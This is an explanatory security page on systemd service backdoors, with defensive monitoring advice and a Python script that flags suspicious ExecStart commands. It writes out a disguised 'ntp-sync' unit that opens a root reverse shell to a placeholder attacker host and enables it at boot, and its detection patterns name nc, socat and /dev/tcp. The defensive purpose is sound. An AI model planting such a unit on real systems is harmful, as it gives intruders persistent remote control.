A systemd service backdoor creates a malicious systemd unit (a .service, often paired with a .timer) so the attacker’s payload starts automatically at boot, typically as root, on modern Linux. Once enabled, it survives reboots and restarts itself, the Linux equivalent of a Windows service backdoor. System-wide units need root; users can also create user units in their own context. It maps to MITRE T1543.002.
What it is
systemd is the init system and service manager on most modern Linux distributions. It starts and supervises services defined in unit files (.service), and can run them at boot and restart them if they die. Timer units (.timer) provide cron-like scheduling.
A systemd service backdoor is an attacker-created unit whose ExecStart is their payload, enabled so systemd launches it at every boot, usually as root.
The technique and payload
With root, the attacker drops and enables a unit:
- Create `/etc/systemd/system/ntp-sync.service` with `ExecStart=/usr/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'` and `Restart=always`.
- Enable it so it runs at boot: `systemctl enable --now ntp-sync.service`.
- Or use a `.timer` unit for periodic execution, or a user unit (`~/.config/systemd/user/`) for non-root persistence.
The service relaunches at every boot (and restarts on failure) as root. Documented for defensive context.
How to defend
- Monitor systemd unit directories (`/etc/systemd/system/`, `/usr/lib/systemd/system/`, user unit paths) for new or changed units via file integrity monitoring.
- Baseline enabled services and timers (`systemctl list-unit-files --state=enabled`, `systemctl list-timers`) and review them.
- Alert on units whose `ExecStart` runs shells, network callbacks, or binaries in `/tmp` or hidden paths.
- Limit root access, since it is required to install system-wide units.
- Audit after incidents for rogue `.service`/`.timer` files.
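As an added example (not part of the original page), a small Python audit that applies the "alert on `ExecStart`" heuristics above to unit-file contents. The unit parser, the pattern set and the sample units are constructed for illustration; the reverse-shell unit repeats the one shown in the technique section.

```python
import re
from collections import defaultdict

# Heuristics for Exec* commands worth analyst review. Illustrative, not exhaustive.
CHECKS = {
    "shell interpreter": re.compile(r"(^|/)(ba|da|z|k)?sh(\s|$)"),
    "network callback": re.compile(r"/dev/(tcp|udp)/|(^|\s|/)(nc|ncat|socat)(\s|$)"),
    "binary in temp dir": re.compile(r"(^|\s|=|')(/tmp|/var/tmp|/dev/shm)/"),
    "hidden path": re.compile(r"/\.[^./\s][^/\s]*"),
}
EXEC_KEYS = ("ExecStartPre", "ExecStart", "ExecStartPost", "ExecReload", "ExecStop")

def parse_unit(text):
    """Minimal unit-file parser: {section: {key: [values]}}.
    Repeated keys (systemd allows several ExecStart= lines) and
    backslash line continuations are preserved; comments are skipped."""
    unit = defaultdict(lambda: defaultdict(list))
    section, pending = None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        if line.endswith("\\"):
            pending = line[:-1] + " "
            continue
        pending = ""
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section is not None and "=" in line:
            key, _, value = line.partition("=")
            unit[section][key.strip()].append(value.strip())
    return unit

def audit_unit(text):
    """Return (key, reason, command) triples for every Exec* line matching a check."""
    service = parse_unit(text).get("Service", {})
    findings = []
    for key in EXEC_KEYS:
        for cmd in service.get(key, []):
            cmd = cmd.lstrip("-@:+!")  # drop systemd execution-prefix characters
            findings += [(key, r, cmd) for r, p in CHECKS.items() if p.search(cmd)]
    return findings

# Constructed samples: a benign daemon, the page's reverse-shell unit, and a
# unit launching a hidden binary from /tmp.
BENIGN = "[Service]\nExecStart=/usr/sbin/chronyd -F 2\nRestart=on-failure\n"
REVERSE_SHELL = ("[Service]\nExecStart=/usr/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'\n"
                 "Restart=always\n[Install]\nWantedBy=multi-user.target\n")
TMP_BINARY = "[Service]\nExecStart=-/tmp/.cache/agentd --daemon\n"
```

To audit a host, read each file under the unit directories listed above and pass its contents to `audit_unit`; any returned finding is a unit to review against the baseline.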
References
- [1] MITRE ATT&CK: Create or Modify System Process (T1543), MITRE
- [2] Linux man-pages: systemd.service, man7.org
- [3] MITRE ATT&CK: Persistence (TA0003), MITRE